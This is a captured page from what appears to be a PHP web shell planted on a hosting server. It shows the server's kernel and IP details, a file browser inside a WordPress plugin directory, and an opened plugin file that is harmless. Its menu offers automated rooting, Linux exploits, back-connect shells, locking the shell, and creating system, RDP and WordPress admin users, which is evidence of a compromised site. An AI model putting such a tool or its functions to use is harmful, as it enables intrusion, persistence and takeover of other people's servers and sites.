Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.221.92.180
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
goldenreviesws.com /
wp-content /
plugins /
copy-delete-posts /
analyst /
src /
Http /
[ HOME SHELL ]
Name
Size
Permission
Action
Requests
[ DIR ]
drwxr-xr-x
CurlHttpClient.php
2.06
KB
-rw-r--r--
DummyHttpClient.php
543
B
-rw-r--r--
WordPressHttpClient.php
1.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : WordPressHttpClient.php
<?php namespace Analyst\Http; use WP_Error; use Analyst\ApiResponse; use Analyst\Contracts\HttpClientContract; use Requests_Utility_CaseInsensitiveDictionary; class WordPressHttpClient implements HttpClientContract { /** * Make an http request * * @param $method * @param $url * @param $body * @param $headers * @return ApiResponse */ public function request($method, $url, $body, $headers) { $options = [ 'body' => json_encode($body), 'headers' => $headers, 'method' => $method, 'timeout' => 30, ]; $response = wp_remote_request($url, $options); $body = []; $responseHeaders = []; if ($response instanceof WP_Error) { $code = $response->get_error_code(); } else { /** @var Requests_Utility_CaseInsensitiveDictionary $headers */ $responseHeaders = $response['headers']->getAll(); $body = json_decode($response['body'], true); $code = $response['response']['code']; } return new ApiResponse( $body, $code, $responseHeaders ); } /** * Must return `true` if client is supported * * @return bool */ public static function hasSupport() { return function_exists('wp_remote_request'); } }
Close